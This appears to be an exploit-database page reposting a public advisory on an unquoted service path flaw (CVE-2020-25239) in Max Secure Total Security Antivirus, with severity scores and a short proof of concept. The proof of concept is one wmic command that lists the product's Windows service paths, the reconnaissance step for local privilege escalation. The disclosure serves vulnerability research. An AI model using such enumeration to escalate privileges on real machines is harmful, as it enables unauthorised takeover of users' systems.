Advertisement






Max Secure Total Security Antivirus 19.0.4.035 - Unquoted Service Path

CVE Category Price Severity
CVE-2020-25239 CWE-428 $0 - $5,000 High
Author Risk Exploitation Type Date
bhavsec High Local 2021-01-13
CPE
cpe:cpe:/a:max_secure:total_security_antivirus:19.0.4.035
CVSS EPSS EPSSP
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010102

Below is a copy:

Max Secure Total Security Antivirus 19.0.4.035 - Unquoted Service Path
Title: Max Secure Total Security Antivirus 19.0.4.035 - Unquoted Service Path
Date: 2021-01-12
Author: Nir Yehoshua
Vendor: https://maxsecureantivirus.com/
Product: https://maxsecureantivirus.com/MaxTSDM.exe
Tested on: Windows Windows 10 x64 [eng]

PoC:

C:\Users\nir>wmic service get name, pathname | findstr "Max"
MaxCryptMonSrv                            C:\Program Files\Max Secure Total Security\MaxCryptMonSrv.exe                 
MaxMerger                                 C:\Program Files (x86)\Max Secure Total Security\MaxMerger.exe                
MaxWatchDogService                        C:\Program Files\Max Secure Total Security\MaxWatchDogService.exe             
MaxWsRegSrv                               C:\Program Files\Max Secure Total Security\MaxWsRegSrv.exe                    

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum